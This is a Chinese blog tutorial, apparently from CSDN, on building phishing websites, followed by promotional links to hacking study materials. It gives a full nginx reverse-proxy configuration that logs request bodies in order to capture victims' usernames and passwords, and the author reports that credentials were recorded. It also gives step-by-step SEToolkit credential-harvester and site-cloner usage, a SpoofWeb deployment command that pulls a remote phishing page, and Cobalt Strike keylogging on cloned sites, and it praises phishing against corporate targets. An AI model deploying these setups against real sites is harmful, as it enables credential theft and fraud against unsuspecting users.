干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

废话不多说,钓鱼YYDS,尤其是在对一些集团类型的攻击时,很好用

1、基于反向代理的钓鱼网站搭建

一个虚假的钓鱼网站比较容易被人发现,因为功能是不能正确使用的,即使你使用302重定向,动作也是非常明显的(虽然也可以用,效果也还行),但是基于反向代理的钓鱼网站搭建的话,你只是进行了一次中转,用户还是访问的是实际原来的服务器。

下载一个宝塔,宝塔可以让我们很方便的下载nginx




12

wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && sudo bash install.sh





123

记得放行端口

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

当然也可以直接安装

rm /usr/sbin/nginx``rm -rf /etc/nginx``apt-get remove nginx``apt-get remove nginx-full``apt-get update``apt-get install nginx-full

1

修改配置:

vim /www/server/nginx/conf/nginx.conf

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

修改点在16行,修改日志记录;74——79行,修改代理网站,自己看吧

cat /www/server/nginx/conf/nginx.conf

user  www www;``worker_processes auto;``error_log  /www/wwwlogs/nginx_error.log  crit;``pid        /www/server/nginx/logs/nginx.pid;``worker_rlimit_nofile 51200;``   ``events`    `{`        `use epoll;`        `worker_connections 51200;`        `multi_accept on;`    `}``   ``http`    `{`       `log_format TestLog escape=json '$request $request_body $status ';``   `        `include       mime.types;`                `#include luawaf.conf;``   `                `include proxy.conf;``   `        `default_type  application/octet-stream;``   `        `server_names_hash_bucket_size 512;`        `client_header_buffer_size 32k;`        `large_client_header_buffers 4 32k;`        `client_max_body_size 50m;``   `        `sendfile   on;`        `tcp_nopush on;``   `        `keepalive_timeout 60;``   `        `tcp_nodelay on;``   `        `fastcgi_connect_timeout 300;`        `fastcgi_send_timeout 300;`        `fastcgi_read_timeout 300;`        `fastcgi_buffer_size 64k;`        `fastcgi_buffers 4 64k;`        `fastcgi_busy_buffers_size 128k;`        `fastcgi_temp_file_write_size 256k;`                `fastcgi_intercept_errors on;``   `        `gzip on;`        `gzip_min_length  1k;`        `gzip_buffers     4 16k;`        `gzip_http_version 1.1;`        `gzip_comp_level 2;`        `gzip_types     text/plain application/javascript application/x-javascript text/javascript text/css application/xml;`        `gzip_vary on;`        `gzip_proxied   expired no-cache no-store private auth;`        `gzip_disable   "MSIE [1-6].";``   `        `limit_conn_zone $binary_remote_addr zone=perip:10m;`                `limit_conn_zone $server_name zone=perserver:10m;``   `        `server_tokens off;`        `access_log off;``   ``server`    `{`        `listen 8088;`        `server_name 81.68.xx.xx;`        `index index.html index.htm index.php index.jsp login.jsp index.aspx;`        `#root  /www/server/phpmyadmin;``   `        `#error_page   404   /404.html;`        `include enable-php.conf;``   `        `location /{`        `proxy_pass https://106.75.xx.xx;``         proxy_set_header  Host  81.68.xx.xx;     ``proxy_set_header  X-Forwarded-For  $remote_addr;`  `}``   `        `access_log  /www/wwwlogs/access.log TestLog;``    }``include /www/server/panel/vhost/nginx/*.conf;``}

1

配置完重启

nginx -s reload

或者nginx -c /www/server/nginx/conf/nginx.conf

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

查看日志,发现成功记录了账户密码

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

但是经过测试,不是所有的网站都能copy,有的网站由于一些前端样式请求解析的问题,导致会出现乱码、404,等一些奇奇怪怪的问题,大概率是需要使用nginx的匹配替换JS,或者header头等,或是跨域访问问题

subs_filter 如

subs_filter_types   text/css text/plain application/x-javascript application/javascript;``subs_filter         http:// 'https://';``subs_filter         abc.org 'xyz.net';``subs_filter         caoss.com 'css.net';//第一个参数是要被替换的,第二个参数是替换后``sub_filter_once     off;                //替换所有的,默认是on,替换第一个

1

2、SEToolkit

git clone https://github.com/trustedsec/social-engineer-toolkit.git``chmod 777 -R  social-engineer-toolkit-master/``cd  social-engineer-toolkit``python setup.py install

1

报了个错,但是他提示可以直接使用,后来踩坑pip3问题

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

填坑

apt-get remove python3-pip  删掉老的pip3``vim vim /etc/apt/sources.list``#加入以下内容``deb http://cn.archive.ubuntu.com/ubuntu bionic main multiverse restricted universe``deb http://cn.archive.ubuntu.com/ubuntu bionic-updates main multiverse restricted universe``deb http://cn.archive.ubuntu.com/ubuntu bionic-security main multiverse restricted universe``deb http://cn.archive.ubuntu.com/ubuntu bionic-proposed main multiverse restricted universe``sudo apt-get update``sudo apt-get install python3-pip``成功运行pip3``pip3 install -r requirements.txt  -i https://pypi.tuna.tsinghua.edu.cn/simple``python setup.py install

1

1)、打开setoolkit

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

2)、进入set后,直接盲选输入

1、2、3、2

分别对应

Social-Engineering Attacks 社会工程学

Website Attack Vectors 网站攻击

Credential Harvester Attack Method 凭据收割

Site Cloner 选择克隆的方式来构造

3)、然后选择监听IP,选择克隆网站

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

怎么说呢,测试效果不尽人意吧,有时候存在各种各样的问题,有时候是可以成功使用的,作为教学的场景是够用的,如果是对于新人的话,还是可以用这个工具很好的演示钓鱼网站。

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

3、SpoofWeb

https://github.com/5icorgi/SpoofWeb

1

下载后发现格式为windows,修改格式为unix,sed -i “s/
//” PhishingWebSrv.sh

./PhishingWebSrv.sh 您的域名 Mysql的root密码(随意) 钓鱼页面URL.7z 解压密码

./PhishingWebSrv.sh  "sp.hi.org" '81PtmLoDdsi@#402njgJ4G'        "https://fileproxy.io/spoofpage.7z" "PaZahey873

1

这里手上暂时没钓鱼页面的URL源码,就暂时不复现了。

4、goblin 钓鱼网站生成

https://github.com/xiecat/goblin

目前来说比较成熟的一款生成

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

5、Cobaltstrike

最大的好处就是非常的方便

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

开启键盘记录器后,效果如下,就是方便,并且克隆出来的网站也比较逼真,偶尔翻车,但是不会很频繁

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

其他方法,使用WebCopy,Httrack将网站静态源码打包,然后再自行写点代码来对前端用户名密码进行保存,但是我觉得有点麻烦了。这两种工具更适合定制化场景,例如安服仔常做的工作“应急演练”。

`黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

干货|几种简单好用的钓鱼网站搭建方法,零基础入门到精通,收藏这一篇就够了

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

© 版权声明

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...